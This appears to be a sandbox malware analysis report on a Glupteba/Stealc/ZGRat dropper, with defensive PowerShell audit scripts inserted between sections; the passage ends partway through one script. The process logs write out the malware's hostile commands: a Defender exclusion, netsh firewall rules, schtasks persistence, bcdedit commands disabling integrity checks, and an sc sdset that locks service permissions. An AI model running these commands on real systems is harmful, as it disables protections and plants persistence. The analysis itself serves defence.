Malware Analysis Report

2024-11-30 20:09

Sample ID 240509-d4hqasbb76
Target edcd9de4254f050ffa56e723be49c0c5.bin
SHA256 166fbe093262a894127000d51aac0677a370cba01faad82120eee2f44a573d04
Tags
glupteba stealc zgrat dropper evasion execution loader rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file edcd9de4254f050ffa56e723be49c0c5.bin was found to be: Known bad.

Malicious Activity Summary

Windows security bypass

ZGRat

Stealc

UAC bypass

Glupteba payload

Glupteba

Detect ZGRat V1

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Checks computer location settings

Drops startup file

Windows security modification

Executes dropped EXE

UPX packed file

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

System policy modification

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 03:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 03:33

Reported

2024-05-09 03:36

Platform

win7-20240221-en

Max time kernel

10s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

Signatures

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Stealc

stealer stealc

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

UPX packed file

upx
Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2884 wrote to memory of 2692 (3 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 2520 (9 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2884 wrote to memory of 2436 (3 identical events) | N/A | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | C:\Windows\system32\WerFault.exe

System policy modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2884 -s 668

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

"C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe"

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

"C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509033401.log C:\Windows\Logs\CBS\CbsPersist_20240509033401.cab

C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe

"C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe"

C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe

"C:\Users\Admin\Pictures\1VaxlTJYIgF4ldxBuWcfPF3J.exe"

C:\Users\Admin\Pictures\GaMIf1JbhjjNrLk2GeuhJpfH.exe

"C:\Users\Admin\Pictures\GaMIf1JbhjjNrLk2GeuhJpfH.exe"

C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe

"C:\Users\Admin\Pictures\IpBukxAywcN2A0BKLnCc8fPc.exe"

C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe

"C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe"

C:\Users\Admin\AppData\Local\Temp\u234.0.exe

"C:\Users\Admin\AppData\Local\Temp\u234.0.exe"

C:\Users\Admin\AppData\Local\Temp\u234.1.exe

"C:\Users\Admin\AppData\Local\Temp\u234.1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe

"C:\Users\Admin\Pictures\UVFbhnWFMcRHIHLQRVNHopuJ.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe

"C:\Users\Admin\Pictures\TAvsnx3j6f9gKYExMbiNA1dz.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 03:33

Reported

2024-05-09 03:36

Platform

win10v2004-20240426-en

Max time kernel

37s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ep5TwNKvUwdyPDoIHAQUMpCs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sGn6DaoKUBF4WWlOItI7u4Gm.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86Zp0EmxuAuS22SLWZyfIL49.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RiR6CTbrZrpMxY8KkXD6hg0g.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qap7V3dROhFV1NeaOeXSSyol.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\twT78Mx9z83SdTlWudKKUo0W.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\g6wMedraySsiYCyr3FHKGcj4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
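
The four signatures above (UAC bypass, Windows security bypass, Windows security modification, Checks whether UAC is enabled) all come down to two registry writes by the sample: a value named after its own path under Windows Defender\Exclusions\Paths, and EnableLUA = 0 under Policies\System. The script below is an added triage example, not part of the sandbox report, that audits both locations on a live host and reports Tamper Protection state, which on protected hosts can block the direct exclusion write the sandbox recorded. It goes slightly beyond the report by also checking ConsentPromptBehaviorAdmin, the usual companion to EnableLUA. The "user-writable" path pattern is an assumption for this example. Run it from an elevated PowerShell.

```powershell
# Added triage example; not part of the sandbox report. Audits the registry
# locations behavioral2 shows the sample writing. Run elevated.
# The "user-writable" pattern is an assumption for this example.
$UserWritable = '(?i)[A-Z]:\\Users\\[^\\]+\\(AppData|Pictures|Downloads|Desktop|Documents)\\|(?i)\\Temp\\|(?i)[A-Z]:\\ProgramData\\'

function Get-DefenderExclusionFindings {
    $findings = @()
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    $fromRegistry = @()
    if (Test-Path $key) {
        # Each excluded path is stored as a value *name* under this key (data = 0),
        # which is exactly what the report shows the sample creating.
        $fromRegistry = @((Get-Item $key).GetValueNames())
    }
    $fromApi = @()
    try { $fromApi = @((Get-MpPreference -ErrorAction Stop).ExclusionPath) } catch { }

    foreach ($path in ($fromRegistry + $fromApi | Where-Object { $_ } | Sort-Object -Unique)) {
        $reasons = @()
        if ($path -match $UserWritable) { $reasons += 'points into a user-writable directory' }
        if ($path -match '(?i)\.(exe|dll|bat|cmd|ps1|vbs|js)$') { $reasons += 'excludes a single executable or script' }
        if ($reasons) {
            $source = if ($fromRegistry -contains $path) { 'registry' } else { 'Get-MpPreference' }
            $findings += [pscustomobject]@{
                Check  = 'DefenderExclusionPath'
                Value  = $path
                Source = $source
                Reason = $reasons -join '; '
            }
        }
    }
    $findings
}

function Get-UacFindings {
    $findings = @()
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $sys = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    # EnableLUA = 0 switches UAC off at the next reboot: administrators then run
    # with their full token and the consent prompt disappears.
    if ($sys.EnableLUA -eq 0) {
        $findings += [pscustomobject]@{ Check='EnableLUA'; Value=0; Source='registry'; Reason='UAC disabled (effective after reboot)' }
    }
    # Not in this report's indicators; added as the usual companion check:
    # UAC stays "on" but elevation happens silently.
    if ($sys.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += [pscustomobject]@{ Check='ConsentPromptBehaviorAdmin'; Value=0; Source='registry'; Reason='admin elevation without prompt' }
    }
    $findings
}

function Get-TamperProtectionState {
    try { (Get-MpComputerStatus -ErrorAction Stop).IsTamperProtected } catch { 'unknown' }
}

"Tamper Protection enabled: $(Get-TamperProtectionState)"
$results = @(Get-DefenderExclusionFindings) + @(Get-UacFindings)
if ($results) { $results | Format-Table -AutoSize -Wrap } else { 'No suspicious exclusions or UAC policy changes found.' }
```

Exclusions that should not be there are removed with Remove-MpPreference -ExclusionPath; an exclusion naming a single .exe under a user's Temp or Pictures folder has no legitimate administrative use. Restoring EnableLUA to 1 takes effect only after a reboot, the same as the attacker's change.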

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2208 set thread context of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
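
PID 2208 (the sample, running from %TEMP%) writes into regsvcs.exe (PID 2324) and then sets its thread context; together with the WriteProcessMemory entries further down this is the process-hollowing sequence: start a signed Microsoft binary suspended, overwrite its image, point the main thread at the new entry. The script below is an added hunting example, not from the report, that lists live .NET utility processes and flags the two artefacts this technique leaves on the process tree: a parent in a user-writable directory (or already gone) and a command line with no arguments, which regsvcs.exe never has when run legitimately. The list of target binaries and the "user-writable" pattern are assumptions for this example.

```powershell
# Added hunting example; not from the sandbox report. Flags .NET utility
# processes that look hollowed, the pattern recorded for PID 2208 -> regsvcs.exe.
# Target names and the "user-writable" pattern are assumptions for this example.
$HollowTargets = @('regsvcs.exe', 'regasm.exe', 'installutil.exe', 'aspnet_compiler.exe', 'msbuild.exe')
$UserWritable  = '(?i)[A-Z]:\\Users\\[^\\]+\\(AppData|Pictures|Downloads|Desktop|Documents)\\|(?i)\\Temp\\|(?i)[A-Z]:\\ProgramData\\'

function Get-HollowingCandidates {
    param(
        # One snapshot of Win32_Process so parent lookups are consistent
        [object[]]$Processes = (Get-CimInstance Win32_Process)
    )
    $byPid = @{}
    foreach ($p in $Processes) { $byPid[[int]$p.ProcessId] = $p }

    foreach ($p in $Processes) {
        if ($HollowTargets -notcontains $p.Name) { continue }
        $parent = $byPid[[int]$p.ParentProcessId]
        # PID reuse: a "parent" created after the child is not the real parent
        if ($parent -and $parent.CreationDate -gt $p.CreationDate) { $parent = $null }
        $reasons = @()

        if (-not $parent) {
            # Droppers usually exit once the hollowed child is running
            $reasons += 'parent already exited'
            $parentDesc = "$($p.ParentProcessId) <exited>"
        } else {
            $parentDesc = "$($parent.ProcessId) $($parent.ExecutablePath)"
            if ($parent.ExecutablePath -match $UserWritable) {
                $reasons += 'parent runs from a user-writable path'
            }
        }

        # regsvcs.exe/regasm.exe always take an assembly to register; a command
        # line that is only the (quoted) image path means the process was created
        # as an empty shell for someone else's code.
        $bareImage = '(?i)\\' + [regex]::Escape($p.Name) + '"?\s*$'
        if ($p.CommandLine -and $p.CommandLine -match $bareImage) {
            $reasons += 'no command-line arguments'
        }

        if ($reasons) {
            [pscustomobject]@{
                Pid     = $p.ProcessId
                Image   = $p.ExecutablePath
                Parent  = $parentDesc
                Reasons = $reasons -join '; '
            }
        }
    }
}

Get-HollowingCandidates | Format-Table -AutoSize -Wrap
```

This only sees processes that are still running. For a retrospective view the same condition is a Sysmon Event ID 1 (process create) where Image ends in one of the target names, ParentImage sits under a user profile or Temp, and CommandLine carries no arguments; the sandbox's SetThreadContext and WriteProcessMemory entries are what that event does not show you.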

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
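
behavioral2 records two persistence mechanisms: the hollowed regsvcs.exe drops randomly named .bat files into the user's Startup folder (Drops startup file, above), and schtasks.exe is invoked twice with arguments the report does not capture. The script below is an added triage example, not part of the report, that enumerates both on a live host: every Startup folder on disk with the first lines of any script found there, and every scheduled task whose action runs from a user-writable location. The "user-writable" pattern and the script extensions of interest are assumptions for this example.

```powershell
# Added triage example; not part of the sandbox report. Enumerates the two
# persistence mechanisms behavioral2 records: Startup-folder scripts and
# scheduled tasks running from user-writable paths. Patterns are assumptions.
$UserWritable = '(?i)[A-Z]:\\Users\\[^\\]+\\(AppData|Pictures|Downloads|Desktop|Documents)\\|(?i)\\Temp\\|(?i)[A-Z]:\\ProgramData\\'
$ScriptExt    = @('.bat', '.cmd', '.vbs', '.js', '.ps1', '.hta')

function Get-StartupItems {
    # Per-user Startup folders for every profile on disk, plus the all-users one
    $dirs = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup")
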